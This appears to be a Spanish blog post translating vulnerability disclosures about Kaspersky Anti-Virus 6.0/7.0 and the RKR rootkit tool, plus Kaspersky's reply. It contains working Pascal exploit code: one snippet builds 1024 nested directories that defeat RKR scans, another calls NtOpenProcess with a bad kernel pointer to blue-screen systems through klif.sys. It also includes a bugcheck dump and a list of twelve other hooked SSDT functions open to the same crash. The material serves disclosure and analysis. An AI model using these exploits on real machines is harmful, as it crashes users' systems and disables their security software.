El objetivo principal del exploit es usar restricciones del sistema de archivos que también están presentes en RKR. El exploit crea un árbol de 1024 directorios es decir cada uno esta dentro del anterior, y después copia calc.exe (la calculadora de windows) en el último directorio creado con el nombre “test.exe”. Después de crear este exploit cualquier escaneada al disco con RKR será completamente inútil, porque cuando RKR pase por el directorio del exploit este comenzara a mostrar todo los directorios y archivos como "Visible in Windows API, MFT, but not in directory index".

Usando este exploit con las viejas versiones de consolas genera un error de violación de acceso.

El codigo del exploit se muestra a continuación…

Advertencia:

Debido a las raices del Sitema de Archivos y a las restricciones de la Ínterfaz Grafica de Windows no es sencillo eliminar el exploit del disco. Así que no lo uses en una maquina real si no sabes como eliminar el archivo.

var

 i: integer;

 buf: array[0..100000] of wchar;

 buf2: LBuf;

begin

 memzero(@buf, sizeof(buf));

 GetWindowsDirectoryW(buf2, MAX_PATH);

 strcpyW(buf, '\\?\C:\adir');

 CreateDirectoryW(buf, nil);

 for i := 0 to 1023 do

 begin

   strcatW(buf, '\adir');

   CreateDirectoryW(buf, nil);

 end;

 strcatW(buf, '\test.exe');

 strcatW(buf2, '\calc.exe');

 CopyFileW(buf2, buf, false);

end;

Este no es un exploit “puro” debido a que no genera escalación de privilegios. Este se puede clasificar como uno del tipo DoS (Denegación del Servicio).

Para corregir esta vulnerabilidad es necesario modificar RKR para soportar rutas UNC.

Después de que ayer se publicara acerca de la Vulnerabilidad de KAS 7.0 Kaspersky Lab reacciono diciendo que no fueron notificados a tiempo con todo y que la vulnerabilidad tenia un año o mas he aquí lo que Kaspersky respondió hoy

El enlace original en ingles

Un consultor (EP_X0FF), recientemente ha publicado en rootkit.com acerca de una vulnerabilidad en KAV 7.0. Desafortunadamente el autor de este material no se ha apegado a la practica estándar de la industria, de contactar a la empresa desarrolladora antes de divulgar los detalles de la vulnerabilidad. Aunque el autor afirma que todos los intentos de informar a Kaspersky Lab acerca de esta vulnerabilidad, fueron ignorados, este no ha sido el caso: Si hubiéramos sido informados, este hecho hubiera sido resuelto desde mucho tiempo atrás.

Los siguientes productos son vulnerables:

Kaspersky Internet Security 6.0/7.0
Kaspersky Anti-Virus 6.0/7.0
Kaspersky Anti-Virus for Windows Workstations 6.0
Kaspersky Anti-Virus 6.0 for Windows Servers

Estos productos son vulnerables solo cuando se ejecutan en los siguientes SOs:


Windows NT
Windows 2000
Windows 2003 x86
Windows XP x86
Productos corriendo en otros SO de Microsoft no son afectados por este percance.

Esta vulnerabilidad esta clasificada como de bajo riesgo debido a la naturaleza de la misma: El usuario tiene que lanzar el exploit manualmente en su computadora. El resultado de explotar esta vulnerabilidad es un error critico del sistema (BSOD) pero no hay una escalación de privilegios o provee algún control de el equipo en forma remota.

Un parche para esta vulnerabilidad sera lanzado en estos días. El parche se instalara estomáticamente. Daremos mas información cuando se lance el parche.

Seguramente que a los señores de KAV esta información no les cayo muy en gracia pero en fin alguine la tenia que publicar...

Saludos

Esta es una traducción de una entrada que hizo el buen EP_X0FF en los foros de sysinternals
y que pueden leer en ingles aquí

El bien conocido antivirus Kaspersky, desde hace un buen tiempo sufre de un bug muy peligroso, el cual permite tronar el sistema protegido por este antivirus, aun desde la cuenta de invitado.

Todos los intentos de avisar a Kaspersky Lab sobre esta vulnerabilidad han sido ignorados. Este material fue mostrado varios años atras, y en el ultimo verano publicamos un nuevo exploit para Kaspersky AV 6.0 el cual se basa en los descubrimientos previos de Ms-Rem. Y despues de este tiempo nada ha cambiado. Aun ahora con la nueva version Kaspersky AV 7.0 este exploit sigue funcionando muy bien.
El objetivo principal de este exploit es hacer una llamda a NtOpenProcess con parametros invalidios. Esta funcion esta intervenida (hooked) por el diver de Kaspersky llamdo klif.sys y la reazon para este intercepción es obia - Esta es la manera en que Kaspersky AV se protege de accesos no autorizados que pudieran cerrar el proceso, esto es muy usado por el malware.

Aqui el prototipo de esta función

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL );


Aquí un pequeño exploit codificado en pascal(funciona para el klif.sys vesion 6.12.10.280 y versiones previas)


var
ob1: OBJECT_ATTRIBUTES;
p1: DWORD;
begin
ob1.Length := sizeof(ob1);
NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;

Como podran ver el ultimo parametro es la dirección de la estructura CLIENT_ID, la cual apunta hacia una región aleatoria dentro de la memoria del kernel.
al probar el xploit en una instalación limpia de windows XP , sin KAV -no hay BSOD(Blue Screen Of Death o Pantallazo azul).

Al ejecutarlo en un Windows XP protegido por KAV 7.0 -inmediatamente tenemos un BSOD - PAGE_FAULT_IN_NONPAGED_AREA.

Pero ¿Porque pasa esto? la respuesta es muy sencilla. Supongo que el codigo fuente de el hook en NtOpenProcess es algo como esto:

NTSTATUS NewNtOpenProcess (
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL)
{
__try
{

if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;

else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
ObjectAttributes, ClientId);
__except (EXCEPTION_EXECUTE_HANDLER)
{
... stuff here ...
}
}

El gran problema aquí es ClientId->UniqueProcess, ya que ClientId es un PUNTERO a una estructura. El hecho de accesar a una región invalida de memoria produce inmediatamente un PAGE_FAULT_IN_NONPAGED_AREA.


el exploit original fue creado por Ms-Rem y luce así


NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);

Comopodras observar los desarrolladores de KAV han usado un bloque try/except, y parece ser que no saben usar otro tipo de funciones manejadoras de erores.

Esperemos que los desarrolladores de Kaspersky Antivirus descubran el fabuloso programa llamado NtCall y corrigan su bug.


*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP: 46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

MM_INTERNAL_CODE: 0

CUSTOMER_CRASH_COUNT: 1

DEFAULT_BUCKET_ID: WRONG_SYMBOLS

BUGCHECK_STR: 0x50

LAST_CONTROL_TRANSFER: from f941b39a to f941840c

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND: kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08 movsx ecx,byte ptr [eax]

SYMBOL_STACK_INDEX: 0

FOLLOWUP_NAME: MachineOwner

IMAGE_NAME: klif.sys

SYMBOL_NAME: klif+1940c

BUCKET_ID: WRONG_SYMBOLS

Followup: MachineOwner

Algunos descubrimientos hechos por UG North muestran que hay otras funciones que tambien estan intervenidas por klif.sis las cuales pueden ser explotadas con ataques similares.

Lista de entradas en la SSDT explotables (Windows XP / KAV 7.0.0.55)

==================================
|[Idx] [nombre de la función] |
==================================
|[41 ] NtCreateKey
|[47 ] NtCreateProcess
|[48 ] NtCreateProcessEx
|[50 ] NtCreateSection
|[52 ] NtCreateSymbolicLinkObject
|[53 ] NtCreateThread
|[65 ] NtDeleteValueKey
|[99 ] NtLoadKey2
|[119] NtOpenKey
|[122] NtOpenProcess
|[125] NtOpenSection
|[177] NtQueryValueKey
==================================
Cualquier llamada a esas funciones con parametros invalidos, llevara a un BSOD.

Este tipo de exploit fue descubierto por Ms-Rem en el 2005 y funciona para KAV 5.0

Como se mostro este exploit funciona para todas la versiones de Kaspersky Antivirus incluyendo la nueva versión 7.0.

¿Realmente aun crees quie estas portegido?